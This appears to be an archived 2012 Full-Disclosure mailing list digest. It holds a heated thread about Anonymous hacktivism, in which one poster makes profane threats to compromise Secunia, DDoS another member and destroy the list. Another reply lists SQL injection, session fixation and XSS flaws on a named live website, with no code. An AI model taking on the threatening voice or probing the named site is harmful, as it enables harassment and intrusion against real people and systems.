yea...well, they think I am you...so... lol, i hope they do :P coz, you will get fuxed, for anything i have said :) later! On 26 January 2012 09:10, andrew.wallace andrew.wall...@rocketmail.com wrote: My lawyers are looking through this thread to see if anything libelous has been said against me or the n3td3v organisation. --- Andrew Wallace Independent consultant www.n3td3v.org.uk From: xD 0x41 sec...@gmail.com To: Levente Peres sheri...@sansz.org Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, January 25, 2012 9:24 PM Subject: Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins stfu idiot. they can do wtf they want, think about that! now, go fuck yaself...and enjoy mailing on FD and secunia is like, got smtp problems now ;) tc. GLOW you all thought im some fuckwit called n3td3v ,for this, you all pay! I, single fucking handedly, will destroy secunia , and this bs list. BELIEVE THAT TO! On 26 January 2012 07:53, Levente Peres sheri...@sansz.org wrote: On a personal note, maybe OFF... I fail to see the gain in such retaliations, especially in organized ones... First the Megaupload retaliation, now the UN... and for what... I know people want to be heard, but this is plainly sending the wrong message. This will give decision makers EXACTLY what they WANT. They coax otherwise smart people into acting out violently, thereby creating just the false-flag anarchy to prove their point, which is: yes, we need to censor and control everything especially the Internet, because see, there's already a 'war out there at the gates and we need to protect etc. whatever'. We've seen it before countless times and this reverse strategy almost always works. If anyone from the responsible groups are reading this, please know that I'm not against the point that you are trying to make... You are all learned and knowledgable people, otherwise you wouldn't have been able to pull this complicated scheme off... but I implore you to reconsider such outbursts in the future for the sake of the very thing that you are trying to protect... What's done is done, but let's not give these goons one more reason to take away freedom even more so... Please. Just consider this. That's all I'm asking... And I guess that's all I wanted to say. Levente On 01/25/2012 08:20 AM, karma cyberintel wrote: (CBS) - The week began on a high note for Internet activist. The biggest organized effort to blackout websites in solidarity over the Stop Online Piracy Act (SOPA) and Protect IP Act (PIPA) was a huge success sources form for more details http://www.karmacyberintel.net/2012/01/megaupload-anonymous-hacker-retaliation-nobody-wins/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Faux Anonymous hackers to Facebook: 'We're not playing'
stfu idiot.. now go look at your boxes :) and netstatsand enjoy being part of, a much nicer, smaller organisation wich is only here, to destroy you all. :) bye! oh btw, secunia,.com is also, owned. have phun! GLOW On 26 January 2012 09:19, Dave m...@propergander.org.uk wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 25/01/2012 20:16, adam wrote: If we cared, we'd visit that site of our own volition. Secondly, even if we were interested: most of the people on these lists are intelligent enough not to click on links from spammers. Third, even if the content were interesting, even if this were the place for it and even if you hadn't spammed: pay and register is incentive enough for me *not* to join and * not* to ever visit that site again. Short version: this purpose of this list isn't for you to spam your new state-of-the-art website. Instead, it's typically to discuss/disclose issues/concepts related to computer/network security. Once in a while, there are discussions about the overflowing stupidity that some site owners/coders have. For example, people that stupidly (and blindly) inject code (e.g. for tracking purposes) into every single file on their site, regardless of extension: http://www.karmacyberintel.net/robots.txt Another one is blatantly disclosing paths in robots.txt that aren't even linked to and would never be found anyway (at least by bots that honor robots.txt, which ends up being the exact opposite of the desired effect). An example of how/why this can be a problem: md5sum of tiny_mce.js off your server is 9754385dabfc67c8b6d49ad4acba25c3, if we perform a simple Google search - we can determine that you're likely running version 3.3.1 of Wordpress. From there, we have enough information to perform a targeted attack on your server. Except, we don't need to because you've already made it more than easy enough for us. Pretty much every single field on http://www.karmacyberintel.net/pay/ is vulnerable to SQL injection, which could easily allow anyone to completely compromise the database and possibly the entire site. On top of that, register.php also allows for session fixation attacks, as a result of header/cookie manipulation. If that weren't bad enough, the admin section for your karma theme is also vulnerable to cross-site scripting. Not to mention, all the problems with with how you've configured SSL and everything else. If you're going to spam, at least make sure the website you're spamming has been tested and determined to be *somewhat* secure. Thanks for the smile. If one is not certain that ones own house is not made of glass, it's best to not throw stones. D On Tue, Jan 24, 2012 at 11:31 PM, karma cyberintel karmacyberint...@gmail.com wrote: *UPDATE* After attacking several government sites to protest controversial US legislation in past weeks, hacktivist group Anonymous is setting its sights on one of the Internet's biggest targets: Facebook. Or maybe not. Sources Form karmacyberintel.net for more details http://www.karmacyberintel.net/2012/01/faux-anonymous-hackers-to-facebook-were-not-playing/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTyB/77Ivn8UFHWSmAQLoYAf8CbOtPVtl7nyo+ujnkf1qeWf7hGzjU5lJ xWr8kd/N37n50u3a6PXfy9p7TC+wQ2MNoJCZ6Y02sPZ6KxlUXXOC/K8iXigFK1yh rVrNaDLSR8+WgfOdskl7mYZXvHG7n2u8p3MNOll0D9MG1vn179P/oV3JXawSyHMZ EhhWPjjiJZfNwPhPBTQnQMhg3HoWYsJKrVR5CIu/EKiAPaS2xG7l+DojADZmPsIU B9BvSqLzJoVFUQ5zVF3KzPJLqIimqgH6HmK18Nmhs/kcBaxjVRL88XcfP1bYtl/Y kg22lkaRU5IIxDviy5ztxkBERKu7SyuBjcrE6B23rBia9xeCrloMdQ== =U0gT -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anonymous deletes CBS.com, solicits opinions on who to hack next
This guy is full of win, it's like watching the special Olympics in HD. On Wed, Jan 25, 2012 at 12:51 PM, Henry M henr...@gmail.com wrote: Reporting three day old news to Full-Disclosure. Awesome. On Wed, Jan 25, 2012 at 1:51 AM, karma cyberintel karmacyberint...@gmail.com wrote: Anonymous deletes CBS.com, solicits opinions on who to hack next sources form karmacyberintel.net for more details http://www.karmacyberintel.net/2012/01/anonymous-deletes-cbs-com-solicits-opinions-on-who-to-hack-next/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
well.. thats exactly whats happening :) so, hope your lawyer, is a fucking GUN! lol.. thats just, i hope, your twelling truth and DO have this power...to ruin them... as id love to watch :) under, your name, or, mine..your in UK, im not... :) oh, they been defaming, for ages now..and, ignoring also...because i wouldnot give them, my 0days..well, they can smoke my cock now... coz, half of them, i have in one *channel* , and the other, are about to join it..and secunia...has probs, with smtp :) so, if i am doing all of this to them, and theyre blaming YOU, well, thats not my fault, i and even others, have tried to tell them, our names, mean little...and, my name is NOT Andrew, it is DREW... or rather, in scottish it is, (highlands) dRU ... So, yes, theyre defaming but, i want to see you, actually do something, coz sofar, this has been said before, about them breaking laws etc etc, wich, they are, simply by adding you or me, as a 'cc' is automtically forcing us, to read theyre crap, wether i like you, or not... now, they hve been told, but, im actually, starting to like you now ;) you sure, we arent the same guy ? coz, we are soo similar :P~~ And secunia,and FD, is finished this year :) Now as for secunia, it is yes sirs, to all those, who helped me, when, i was asking for YOUR helps, wich, i doubt you even would remember coz, ofcourse, you guys would NEVER do that to someone, then, have nonstop, attacked my persona... thinking, i am someone else...well, there is stacks, and stacks.. of emails, and many in private either way, i will destroy secunia and Fd, on my own. this year, is fds lastm, enjoy it. GLOWING DOOM FOR ALL On 26 January 2012 09:36, andrew.wallace andrew.wall...@rocketmail.com wrote: That is unfortunate for them because defamation is against the law. I take a tough approach these days to anyone using the list in this way. You are not anonymous, you are reachable anywhere in the world. Andrew From: xD 0x41 sec...@gmail.com To: andrew.wallace andrew.wall...@rocketmail.com Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, January 25, 2012 10:20 PM Subject: Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins yea...well, they think I am you...so... lol, i hope they do :P coz, you will get fuxed, for anything i have said :) later! On 26 January 2012 09:10, andrew.wallace andrew.wall...@rocketmail.com wrote: My lawyers are looking through this thread to see if anything libelous has been said against me or the n3td3v organisation. --- Andrew Wallace Independent consultant www.n3td3v.org.uk From: xD 0x41 sec...@gmail.com To: Levente Peres sheri...@sansz.org Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, January 25, 2012 9:24 PM Subject: Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins stfu idiot. they can do wtf they want, think about that! now, go fuck yaself...and enjoy mailing on FD and secunia is like, got smtp problems now ;) tc. GLOW you all thought im some fuckwit called n3td3v ,for this, you all pay! I, single fucking handedly, will destroy secunia , and this bs list. BELIEVE THAT TO! On 26 January 2012 07:53, Levente Peres sheri...@sansz.org wrote: On a personal note, maybe OFF... I fail to see the gain in such retaliations, especially in organized ones... First the Megaupload retaliation, now the UN... and for what... I know people want to be heard, but this is plainly sending the wrong message. This will give decision makers EXACTLY what they WANT. They coax otherwise smart people into acting out violently, thereby creating just the false-flag anarchy to prove their point, which is: yes, we need to censor and control everything especially the Internet, because see, there's already a 'war out there at the gates and we need to protect etc. whatever'. We've seen it before countless times and this reverse strategy almost always works. If anyone from the responsible groups are reading this, please know that I'm not against the point that you are trying to make... You are all learned and knowledgable people, otherwise you wouldn't have been able to pull this complicated scheme off... but I implore you to reconsider such outbursts in the future for the sake of the very thing that you are trying to protect... What's done is done, but let's not give these goons one more reason to take away freedom even more so... Please. Just consider this. That's all I'm asking... And I guess that's all I wanted to say. Levente On 01/25/2012 08:20 AM, karma cyberintel wrote: (CBS) - The week began on a high note for Internet activist. The biggest organized effort to blackout websites in solidarity over the Stop Online Piracy Act (SOPA) and Protect IP Act (PIPA) was a huge success sources form for more details
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
You are not anonymous, you are reachable anywhere in the world. hahah yes sir. suck my dick now, and stfu, actually no keep talking, itll give me more reasons, to own you and put you in my 'army' also :) so, ill ddos your own site, with your own box, k :) enjoy, security expert :P hahahahaha On 26 January 2012 09:36, andrew.wallace andrew.wall...@rocketmail.com wrote: That is unfortunate for them because defamation is against the law. I take a tough approach these days to anyone using the list in this way. You are not anonymous, you are reachable anywhere in the world. Andrew From: xD 0x41 sec...@gmail.com To: andrew.wallace andrew.wall...@rocketmail.com Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, January 25, 2012 10:20 PM Subject: Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins yea...well, they think I am you...so... lol, i hope they do :P coz, you will get fuxed, for anything i have said :) later! On 26 January 2012 09:10, andrew.wallace andrew.wall...@rocketmail.com wrote: My lawyers are looking through this thread to see if anything libelous has been said against me or the n3td3v organisation. --- Andrew Wallace Independent consultant www.n3td3v.org.uk From: xD 0x41 sec...@gmail.com To: Levente Peres sheri...@sansz.org Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, January 25, 2012 9:24 PM Subject: Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins stfu idiot. they can do wtf they want, think about that! now, go fuck yaself...and enjoy mailing on FD and secunia is like, got smtp problems now ;) tc. GLOW you all thought im some fuckwit called n3td3v ,for this, you all pay! I, single fucking handedly, will destroy secunia , and this bs list. BELIEVE THAT TO! On 26 January 2012 07:53, Levente Peres sheri...@sansz.org wrote: On a personal note, maybe OFF... I fail to see the gain in such retaliations, especially in organized ones... First the Megaupload retaliation, now the UN... and for what... I know people want to be heard, but this is plainly sending the wrong message. This will give decision makers EXACTLY what they WANT. They coax otherwise smart people into acting out violently, thereby creating just the false-flag anarchy to prove their point, which is: yes, we need to censor and control everything especially the Internet, because see, there's already a 'war out there at the gates and we need to protect etc. whatever'. We've seen it before countless times and this reverse strategy almost always works. If anyone from the responsible groups are reading this, please know that I'm not against the point that you are trying to make... You are all learned and knowledgable people, otherwise you wouldn't have been able to pull this complicated scheme off... but I implore you to reconsider such outbursts in the future for the sake of the very thing that you are trying to protect... What's done is done, but let's not give these goons one more reason to take away freedom even more so... Please. Just consider this. That's all I'm asking... And I guess that's all I wanted to say. Levente On 01/25/2012 08:20 AM, karma cyberintel wrote: (CBS) - The week began on a high note for Internet activist. The biggest organized effort to blackout websites in solidarity over the Stop Online Piracy Act (SOPA) and Protect IP Act (PIPA) was a huge success sources form for more details http://www.karmacyberintel.net/2012/01/megaupload-anonymous-hacker-retaliation-nobody-wins/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
I'm impressed that Andrew continues to maintain the dumbest person on FD position without actually being on FD. On Wed, Jan 25, 2012 at 5:26 PM, xD 0x41 sec...@gmail.com wrote: You are not anonymous, you are reachable anywhere in the world. hahah yes sir. suck my dick now, and stfu, actually no keep talking, itll give me more reasons, to own you and put you in my 'army' also :) so, ill ddos your own site, with your own box, k :) enjoy, security expert :P hahahahaha On 26 January 2012 09:36, andrew.wallace andrew.wall...@rocketmail.com wrote: That is unfortunate for them because defamation is against the law. I take a tough approach these days to anyone using the list in this way. You are not anonymous, you are reachable anywhere in the world. Andrew From: xD 0x41 sec...@gmail.com To: andrew.wallace andrew.wall...@rocketmail.com Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, January 25, 2012 10:20 PM Subject: Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins yea...well, they think I am you...so... lol, i hope they do :P coz, you will get fuxed, for anything i have said :) later! On 26 January 2012 09:10, andrew.wallace andrew.wall...@rocketmail.com wrote: My lawyers are looking through this thread to see if anything libelous has been said against me or the n3td3v organisation. --- Andrew Wallace Independent consultant www.n3td3v.org.uk From: xD 0x41 sec...@gmail.com To: Levente Peres sheri...@sansz.org Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, January 25, 2012 9:24 PM Subject: Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins stfu idiot. they can do wtf they want, think about that! now, go fuck yaself...and enjoy mailing on FD and secunia is like, got smtp problems now ;) tc. GLOW you all thought im some fuckwit called n3td3v ,for this, you all pay! I, single fucking handedly, will destroy secunia , and this bs list. BELIEVE THAT TO! On 26 January 2012 07:53, Levente Peres sheri...@sansz.org wrote: On a personal note, maybe OFF... I fail to see the gain in such retaliations, especially in organized ones... First the Megaupload retaliation, now the UN... and for what... I know people want to be heard, but this is plainly sending the wrong message. This will give decision makers EXACTLY what they WANT. They coax otherwise smart people into acting out violently, thereby creating just the false-flag anarchy to prove their point, which is: yes, we need to censor and control everything especially the Internet, because see, there's already a 'war out there at the gates and we need to protect etc. whatever'. We've seen it before countless times and this reverse strategy almost always works. If anyone from the responsible groups are reading this, please know that I'm not against the point that you are trying to make... You are all learned and knowledgable people, otherwise you wouldn't have been able to pull this complicated scheme off... but I implore you to reconsider such outbursts in the future for the sake of the very thing that you are trying to protect... What's done is done, but let's not give these goons one more reason to take away freedom even more so... Please. Just consider this. That's all I'm asking... And I guess that's all I wanted to say. Levente On 01/25/2012 08:20 AM, karma cyberintel wrote: (CBS) - The week began on a high note for Internet activist. The biggest organized effort to blackout websites in solidarity over the Stop Online Piracy Act (SOPA) and Protect IP Act (PIPA) was a huge success sources form for more details http://www.karmacyberintel.net/2012/01/megaupload-anonymous-hacker-retaliation-nobody-wins/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
I have found the perfect image to describe my thoughts on this current clash of intellectuals. http://www.threadbombing.com/data/media/27/arguing.jpg On Wed, Jan 25, 2012 at 4:26 PM, xD 0x41 sec...@gmail.com wrote: You are not anonymous, you are reachable anywhere in the world. hahah yes sir. suck my dick now, and stfu, actually no keep talking, itll give me more reasons, to own you and put you in my 'army' also :) so, ill ddos your own site, with your own box, k :) enjoy, security expert :P hahahahaha On 26 January 2012 09:36, andrew.wallace andrew.wall...@rocketmail.com wrote: That is unfortunate for them because defamation is against the law. I take a tough approach these days to anyone using the list in this way. You are not anonymous, you are reachable anywhere in the world. Andrew From: xD 0x41 sec...@gmail.com To: andrew.wallace andrew.wall...@rocketmail.com Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, January 25, 2012 10:20 PM Subject: Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins yea...well, they think I am you...so... lol, i hope they do :P coz, you will get fuxed, for anything i have said :) later! On 26 January 2012 09:10, andrew.wallace andrew.wall...@rocketmail.com wrote: My lawyers are looking through this thread to see if anything libelous has been said against me or the n3td3v organisation. --- Andrew Wallace Independent consultant www.n3td3v.org.uk From: xD 0x41 sec...@gmail.com To: Levente Peres sheri...@sansz.org Cc: full-disclosure@lists.grok.org.uk Sent: Wednesday, January 25, 2012 9:24 PM Subject: Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins stfu idiot. they can do wtf they want, think about that! now, go fuck yaself...and enjoy mailing on FD and secunia is like, got smtp problems now ;) tc. GLOW you all thought im some fuckwit called n3td3v ,for this, you all pay! I, single fucking handedly, will destroy secunia , and this bs list. BELIEVE THAT TO! On 26 January 2012 07:53, Levente Peres sheri...@sansz.org wrote: On a personal note, maybe OFF... I fail to see the gain in such retaliations, especially in organized ones... First the Megaupload retaliation, now the UN... and for what... I know people want to be heard, but this is plainly sending the wrong message. This will give decision makers EXACTLY what they WANT. They coax otherwise smart people into acting out violently, thereby creating just the false-flag anarchy to prove their point, which is: yes, we need to censor and control everything especially the Internet, because see, there's already a 'war out there at the gates and we need to protect etc. whatever'. We've seen it before countless times and this reverse strategy almost always works. If anyone from the responsible groups are reading this, please know that I'm not against the point that you are trying to make... You are all learned and knowledgable people, otherwise you wouldn't have been able to pull this complicated scheme off... but I implore you to reconsider such outbursts in the future for the sake of the very thing that you are trying to protect... What's done is done, but let's not give these goons one more reason to take away freedom even more so... Please. Just consider this. That's all I'm asking... And I guess that's all I wanted to say. Levente On 01/25/2012 08:20 AM, karma cyberintel wrote: (CBS) - The week began on a high note for Internet activist. The biggest organized effort to blackout websites in solidarity over the Stop Online Piracy Act (SOPA) and Protect IP Act (PIPA) was a huge success sources form for more details http://www.karmacyberintel.net/2012/01/megaupload-anonymous-hacker-retaliation-nobody-wins/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
On 2012-01-25, at 16:36, Sanguinarious Rose wrote: I have found the perfect image to describe my thoughts on this current clash of intellectuals. http://www.threadbombing.com/data/media/27/arguing.jpg Alternatively (also, a more memorable link): http://www.internetargument.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
On Wed, Jan 25, 2012 at 6:53 PM, Levente Peres sheri...@sansz.org wrote: This will give decision makers EXACTLY what they WANT. Those who have already given up democracy think that way. People must choose (participate more often in decision making), not a few conglomerates' puppets. Marcio Barbado, Jr. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
On Thu, 26 Jan 2012 09:20:17 +1100, xD 0x41 said: yea...well, they think I am you...so... lol, i hope they do :P On 26 January 2012 09:10, andrew.wallace andrew.wall...@rocketmail.com wrote: My lawyers are looking through this thread to see if anything libelous has been said against me or the n3td3v organisation. Given that I'm *still* waiting for him to carry through with his repeated threats to sue me for a BlackHat 2006 presentation that I didn't even write, I wouldn't worry too much about Andrew's lawyers. https://en.wikipedia.org/wiki/Estoppel_by_acquiescence https://en.wikipedia.org/wiki/Statute_of_limitations (see period of prescription) (Andrew - I'd avoid saying your lawyers are looking at the thread, unless you actually *do* have lawyers looking. You just set the clock ticking on an acquiescence defense or a period of prescription) And I've always wondered exactly who/what the n3td3v organization is - there doesn't seem to be a consultancy doing actual business under that name, or other legal entity that would have standing in a libel suit. Who/what gets listed as plaintiff? (You may as well tell us Andrew - if we don't know who the n3td3v organization is, we can't make an attempt to avoid accidentally libeling it. :) pgpVcobIad6xd.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
On 2012-01-25, at 16:36, Sanguinarious Rose wrote: I have found the perfect image to describe my thoughts on this current clash of intellectuals. http://www.threadbombing.com/data/media/27/arguing.jpg -1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux Local Root -- CVE-2012-0056 -- Detailed Write-up
Ubuntu just released patches: [USN-1342-1] (http://www.ubuntu.com/usn/usn-1342-1/). On Sun, Jan 22, 2012 at 6:25 PM, Jason A. Donenfeld ja...@zx2c4.com wrote: Server presently DoS'd, or dreamhost is tweaking again. Cache link: http://webcache.googleusercontent.com/search?hl=ensafe=offbiw=1009bih=687sclient=psy-abq=cache%3Ahttp%3A%2F%2Fblog.zx2c4.com%2F749pbx=1oq=cache%3Ahttp%3A%2F%2Fblog.zx2c4.com%2F749aq=faqi=g4aql=gs_sm=egs_upl=1077l2167l0l2282l7l4l0l0l0l0l148l403l2.2l4l0 On Sun, Jan 22, 2012 at 19:19, Jason A. Donenfeld ja...@zx2c4.com wrote: Hey Everyone, I did a detailed write-up on exploiting CVE-2012-0056 that some of y'all might appreciate. Pretty fun bug to play with -- dup2ing all over the place for the prize of getting to write arbitrary process memory into su :-). The write up is available on my blog here: http://blog.zx2c4.com/749 . Enjoy. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins
Andrew Farmer wrote: Alternatively (also, a more memorable link): http://www.internetargument.com/ I think the sentiment in that one is overstated. Usually -- really? Sometimes maybe... Aspiring to -- getting closer... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/